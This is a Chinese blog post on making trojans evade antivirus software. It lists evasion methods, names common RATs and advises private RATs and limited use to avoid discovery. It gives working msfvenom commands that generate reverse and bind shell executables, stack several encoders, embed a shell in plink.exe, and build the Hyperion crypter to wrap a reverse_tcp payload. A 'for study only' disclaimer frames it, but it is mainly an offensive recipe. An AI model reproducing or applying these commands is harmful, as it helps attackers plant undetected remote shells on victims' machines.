木马免杀（绕过杀软）

骑猪看日落 2023-07-13 12:14 3阅读 0赞

仅用于学习交流  
免杀是一个渗透测试中最苦恼的环节，也是一个需要学习很久的部分。  
利用kali生成的木马存在的问题就是无法避免市面上大多数的杀软，及时利用kali自带的免杀也无法达到很好的免杀效果。

**免杀技术**  
1.修改二进制文件中的特征字符  
替换、擦除、修改  
2.加密技术  
通过加密方式使得特征字符不可读，从而逃避杀软检测  
运行时分片分段的解密执行，注入进程或杀软不检查的无害文件中  
3.防杀软的检测  
恶意程序本身的特征字符  
加密器crypter的特征字符

**当前的现状**  
1.编写私有的RAT软件，避免普遍杀软所知的特征字符  
2.使用独有crypter软件加密恶意程序  
3.尽可能小范围使用，避免被发现  
4.直接修改特征码（最直接的方式）

**常用的RAT软件**  
灰鸽子、波尔、黑暗彗星、潘多拉、NanoCore

**生成反弹shell**  
msfvenom -p windows/shell/bind\_tcp lhost=1.1.1.1 lport=4444 -a x86 -platform win -f exe -o a.exe

**加密编码反弹shell**  
msfvenom -p windows/shell/bind\_tcp lhost=1.1.1.1 lport=4444 -f raw -e x86/shikata\_ga\_nai -i 5 | msfvenom -a x86 --platform windows -e x86/ countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/ shikata\_ga\_nai -i 9 -b ‘\\x00’ -f exe -o a.exe

**利用模板隐藏shell**  
msfvenom -p windows/shell\_reverse\_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe

msfvenom -p windows/shell/bind\_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata\_ga\_nai -i 5 -a x86 -platform win -f exe > b.exe

**Hyperion（32bit PE加密程序）**  
– Crypter / Container（解密器+PE Loader）  
– https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/ Hyperion-1.2.zip  
– unzip Hyperion-1.2.zip  
– cd Hyperion-1.2 && i686-w64-mingw32-g++ -static-libgcc -static-libstdc++ Src/Crypter/\*.cpp -o h.exe  
– dpkg --add-architecture i386 && apt-get update && apt-get install wine32  
– msfvenom -p windows/shell/reverse\_tcp lhost=192.168.1.15 lport=4444 -platform win -e x86/shikata\_ga\_nai -a x86 -f exe -o a.exe  
– wine h.exe a.exe b.exe

**自己编写后门**  
Windows reverse shell – wine gcc.exe windows.c -o windows.exe -lws2\_32  
Linux shell – gcc linux\_revers\_shell.c -o linux

免杀只是一种了解杀软流程之后的应对方式，文章仅用于交流，免杀的方法很多，文中提及的只是最普及的方式，入门只需要使用免杀加密或者修改特征字符即可，kali自带的免杀效果也不错，在实验环境中进行测试已经足够。免杀只是手段，不是恶意攻击的方式。